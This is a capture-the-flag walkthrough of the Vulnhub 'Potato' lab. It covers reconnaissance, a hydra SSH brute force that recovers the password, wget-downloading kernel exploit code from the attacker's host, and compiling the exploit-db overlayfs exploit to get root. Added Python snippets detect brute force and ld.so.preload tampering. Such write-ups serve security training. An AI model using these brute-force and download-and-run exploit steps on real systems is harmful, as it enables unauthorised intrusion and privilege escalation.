Vulnhub: Potato (SunCSR) target machine, detailed walkthrough

Potato suncsr

Author: jason_huawen

Target host basic information

Name: Potato (SunCSR): 1

Address:

https://www.vulnhub.com/entry/potato-suncsr-1,556/

Hint:

Hint: "If you ever get stuck, try again with the name of the lab"

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.64.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:be:bb:0d      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.234  08:00:27:be:bc:8f      1      60  PCS Systemtechnik GmbH                                                    


Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.234.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.234 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 02:22 EST
Nmap scan report for bogon (192.168.56.234)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Potato
|_http-server-header: Apache/2.4.7 (Ubuntu)
7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
|   2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
|   256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_  256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 08:00:27:BE:BC:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds

The NMAP scan shows that the target host has 2 open ports: 80 (HTTP) and 7120 (SSH).

Get Access

Visiting port 80 shows a potato image; download it to the local Kali Linux machine:

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ls
nmap_full_scan  potato.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ steghide extract -sf potato.jpg                            
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ stegseek potato.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.68% (133.0 MB)           
[!] error: Could not find a valid passphrase.
                                                  

No hidden information could be extracted.

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.56.234 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ nikto -h http://192.168.56.234
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.234
+ Target Hostname:    192.168.56.234
+ Target Port:        80
+ Start Time:         2022-11-28 02:25:33 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 28e, size: 5aec9609b29d1, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-11-28 02:26:21 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto reports a possible RFI vulnerability, but attempting it does not succeed:

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ vim test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
^C
Keyboard interrupt received, exiting.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/info.php?file=http://192.168.56.206/test.txt

Scan for directories:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.234/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/28 02:26:55 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 294]
Progress: 214857 / 220561 (97.41%)===============================================================
2022/11/28 02:27:10 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.234/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,php,sh
[+] Timeout:                 10s
===============================================================
2022/11/28 02:27:24 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 286]
/.php                 (Status: 403) [Size: 285]
/index.html           (Status: 200) [Size: 654]
/info.php             (Status: 200) [Size: 87429]
/.php                 (Status: 403) [Size: 285]
/.html                (Status: 403) [Size: 286]
/server-status        (Status: 403) [Size: 294]
Progress: 1096346 / 1102805 (99.41%)===============================================================
2022/11/28 02:28:50 Finished
===============================================================

It seems the port 80 direction should be set aside for now.

Since the image is a potato, guess that the username is potato (haha); in fact the author gave a hint: Hint: "If you ever get stuck, try again with the name of the lab"

Use hydra to crack the password:

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.234 -s 7120
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-28 02:39:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.234:7120/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 129.33 tries/min, 388 tries in 00:03h, 14344012 to do in 1848:28h, 15 active
[7120][ssh] host: 192.168.56.234   login: potato   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-28 02:43:59
                                                                                         
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ssh potato@192.168.56.234 -p 7120
The authenticity of host '[192.168.56.234]:7120 ([192.168.56.234]:7120)' can't be established.
ED25519 key fingerprint is SHA256:jhXxGF91LI55ANwXCLFFF/zViDY10PbLjrKkgU7Q+8Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.234]:7120' (ED25519) to the list of known hosts.
potato@192.168.56.234's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
Last login: Tue Sep  8 02:04:57 2020 from 192.168.17.172
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
potato@ubuntu:~$ sudo -l
The program 'sudo' can be found in the following packages:
 * sudo
 * sudo-ldap
Try: sudo apt-get install <selected package>
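An added defender-side example, not part of the original post: a small Python detector for the brute-force pattern the hydra run above would leave in the target's sshd log, a burst of failed password attempts for one account from one source followed by a successful login for that same account. The auth.log lines, host name, PIDs and the attacker address 192.168.56.206 are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed sample of sshd auth.log lines (not real log data), modelled on
# the hydra run: repeated failures for "potato" from one source, then a
# success for the same account, plus an unrelated key-based login.
SAMPLE_LOG = """\
Nov 28 02:39:40 ubuntu sshd[2101]: Failed password for potato from 192.168.56.206 port 51234 ssh2
Nov 28 02:39:41 ubuntu sshd[2103]: Failed password for potato from 192.168.56.206 port 51236 ssh2
Nov 28 02:39:41 ubuntu sshd[2105]: Failed password for invalid user admin from 192.168.56.206 port 51238 ssh2
Nov 28 02:39:42 ubuntu sshd[2107]: Failed password for potato from 192.168.56.206 port 51240 ssh2
Nov 28 02:39:43 ubuntu sshd[2109]: Failed password for potato from 192.168.56.206 port 51242 ssh2
Nov 28 02:43:58 ubuntu sshd[2301]: Accepted password for potato from 192.168.56.206 port 51900 ssh2
Nov 28 02:50:00 ubuntu sshd[2400]: Accepted publickey for potato from 192.168.56.10 port 40000 ssh2
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port \d+")

def detect_bruteforce(log_text, threshold=3):
    """Return one finding per (source, user) whose failure count reached
    `threshold`, marking it 'compromised' when a later successful login from
    that source for that user follows the failures (hydra's 'found it' shape)."""
    failures = defaultdict(int)   # (src, user) -> failed attempts so far
    success_after = set()         # (src, user) that logged in after failing
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            failures[(m.group(2), m.group(1))] += 1
            continue
        m = ACCEPTED.search(line)
        if m:
            key = (m.group(3), m.group(2))
            if failures.get(key, 0) >= threshold:
                success_after.add(key)
    findings = []
    for (src, user), n in sorted(failures.items()):
        if n >= threshold:
            findings.append({"source": src, "user": user, "failures": n,
                             "compromised": (src, user) in success_after})
    return findings
```

Moving SSH to port 7120 did not stop the brute force; a failure threshold like this, or a lockout tool fed by the same log, would have.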

Privilege escalation

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39230.c
--2022-11-28 07:51:42--  http://192.168.56.206:8000/39230.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: ‘39230.c’

100%[====================================================================================>] 8,487       --.-K/s   in 0s      

2022-11-28 07:51:42 (406 MB/s) - ‘39230.c’ saved [8487/8487]

potato@ubuntu:/tmp$ gcc -o exploit 39230.c 
potato@ubuntu:/tmp$ ls
39230.c  exploit  linpeas.sh
potato@ubuntu:/tmp$ chmod +x exploit 
potato@ubuntu:/tmp$ ./exploit 
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$ ./exploit 
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$ 

Try a different local privilege escalation exploit:

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39277.c
--2022-11-28 07:55:15--  http://192.168.56.206:8000/39277.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4500 (4.4K) [text/x-csrc]
Saving to: ‘39277.c’

100%[====================================================================================>] 4,500       --.-K/s   in 0s      

2022-11-28 07:55:15 (824 MB/s) - ‘39277.c’ saved [4500/4500]

potato@ubuntu:/tmp$ gcc  -o exploit2 39277.c -lkeyutils -Wall
39277.c:17:22: fatal error: keyutils.h: No such file or directory
 #include <keyutils.h>
                      ^
compilation terminated.
potato@ubuntu:/tmp$ 

The local privilege escalation exploits suggested by the linpeas.sh output all failed.

Check the target host's system version, then query searchsploit:

potato@ubuntu:/tmp$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit ubuntu 3.13.0  
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Esc | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)             | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                        | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation               | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                      | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Esca | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KAS | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privi | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation      | linux/local/41760.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit -m linux/local/37292.c 
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines (466)

Copied to: /home/kali/Vulnhub/potato-suncsr/37292.c


Upload the 37292.c script to the target host:

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/37292.c
--2022-11-28 08:09:07--  http://192.168.56.206:8000/37292.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[====================================================================================>] 4,968       --.-K/s   in 0s      

2022-11-28 08:09:07 (748 MB/s) - ‘37292.c’ saved [4968/4968]

potato@ubuntu:/tmp$ ls
31346.c  37292.c  39230.c  39277.c  exploit  exploit3  linpeas.sh  x
potato@ubuntu:/tmp$ gcc -o exploit4 37292.c 
potato@ubuntu:/tmp$ chmod +x exploit4 
potato@ubuntu:/tmp$ ./exploit4
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 24K
drwx------  2 root root 4.0K Sep  8  2020 .
drwxr-xr-x 22 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  108 Sep  8  2020 .bash_history
-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-r--r--  1 root root   52 Sep  8  2020 proof.txt
# cat proof.txt    
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b
# 

Privilege escalation succeeded; the root flag is obtained.
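An added defender-side example, not from the original post: the exploit run above prints "/etc/ld.so.preload created", and its searchsploit title gives the affected range "3.13.0 < 3.19". The Python below parses a `uname -r` style release string such as 3.13.0-24-generic, checks it against that range, and audits ld.so.preload contents for entries outside the normal library directories. The trusted-directory list and the sample preload contents are assumptions for the demo.

```python
import re

# Affected range as quoted in the searchsploit title for 37292.c:
# "Linux Kernel 3.13.0 < 3.19" (lower bound inclusive, upper bound exclusive).
AFFECTED_MIN = (3, 13, 0)
AFFECTED_MAX = (3, 19, 0)

# Directories a legitimate ld.so.preload entry would normally point into
# (assumption for this example).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed ld.so.preload contents for the demo (not taken from the exploit):
# an entry under /tmp is the kind of indicator the check should flag.
SAMPLE_PRELOAD = "/tmp/evil-preload.so\n"

def parse_kernel_release(release):
    """'3.13.0-24-generic' -> (3, 13, 0); raises ValueError if unparsable."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups())

def kernel_in_affected_range(release, lo=AFFECTED_MIN, hi=AFFECTED_MAX):
    """True when lo <= version < hi. Distribution kernels backport fixes
    without bumping the upstream version, so treat this as a triage hint."""
    return lo <= parse_kernel_release(release) < hi

def audit_ld_preload(contents):
    """Return ld.so.preload entries outside the trusted library directories.
    Entries are whitespace separated; blank lines and '#' lines are skipped."""
    suspicious = []
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for entry in line.split():
            if not entry.startswith(TRUSTED_LIB_DIRS):
                suspicious.append(entry)
    return suspicious

def host_report(release, preload_contents):
    """Combine both checks into one dict a monitoring job could emit.
    preload_contents is the text of /etc/ld.so.preload ('' if absent)."""
    return {"release": release,
            "kernel_affected": kernel_in_affected_range(release),
            "rogue_preload": audit_ld_preload(preload_contents)}
```

On a live host, feed it `platform.release()` and the contents of /etc/ld.so.preload; an unexpected entry there is worth an alert regardless of the kernel check.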

Lessons learned

  1. For CTF-style machines, read the hints the author gives carefully; for example, the author mentions that when you run out of ideas, consider the name of the target machine.

  2. Do not trust a single tool completely; for example, none of the privilege escalation exploits suggested by linpeas.sh ran correctly, but the code found with searchsploit did.

posted @ 2022-11-28 16:20  Jason_huawen